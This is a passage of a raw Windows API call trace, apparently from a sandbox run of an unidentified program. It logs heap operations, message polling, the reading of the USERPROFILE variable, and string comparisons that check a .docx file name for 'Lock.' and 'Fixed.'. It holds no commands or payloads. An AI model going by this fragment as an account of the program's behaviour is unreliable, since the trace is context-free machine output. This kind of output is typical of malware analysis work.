returned 1 [0260.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0260.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0260.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0260.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="46_piKwe1cHySGVu21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_piKwe1cHySGVu21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_piKwe1cHySGVu21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="piKwe1cHySGVu21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iKwe1cHySGVu21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kwe1cHySGVu21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="we1cHySGVu21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e1cHySGVu21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1cHySGVu21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cHySGVu21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HySGVu21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ySGVu21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SGVu21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GVu21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vu21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="21.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0260.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0260.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0260.134] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0260.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0260.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0260.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0260.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0260.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0260.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0260.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0260.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3538 [0260.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0260.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="46_piKwe1cHySGVu21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0260.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_piKwe1cHySGVu21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0260.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_piKwe1cHySGVu21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0260.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="piKwe1cHySGVu21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iKwe1cHySGVu21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kwe1cHySGVu21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="we1cHySGVu21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e1cHySGVu21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0260.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1cHySGVu21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0260.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cHySGVu21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0260.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HySGVu21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ySGVu21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SGVu21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GVu21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vu21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="21.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0260.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0260.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0260.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0260.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0260.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0260.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0260.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0260.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0260.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0260.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0260.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0260.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0260.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0260.137] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0260.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0260.137] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0260.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0260.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0260.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0260.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1798 [0260.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0260.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0260.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0260.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0260.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0260.138] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0260.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0260.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0260.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0260.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0260.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0260.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0260.138] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0260.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0260.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0260.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0260.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0260.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0260.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0260.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0260.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0260.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0260.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17b8 [0260.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0260.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0260.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0260.140] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0260.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0260.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0260.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0260.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0260.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0260.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0260.141] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0260.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0260.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0260.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0260.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0260.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0260.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0260.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0260.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0260.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0260.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0260.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0260.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17d8 [0260.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0260.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0260.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0260.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0260.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0260.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0260.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0260.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0260.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0260.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0260.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0260.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0260.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0260.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0260.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0260.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0260.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0260.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0260.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0260.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0260.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0260.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0260.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0260.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0260.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0260.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0260.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0260.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0260.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0260.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0260.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0260.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0260.144] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.144] 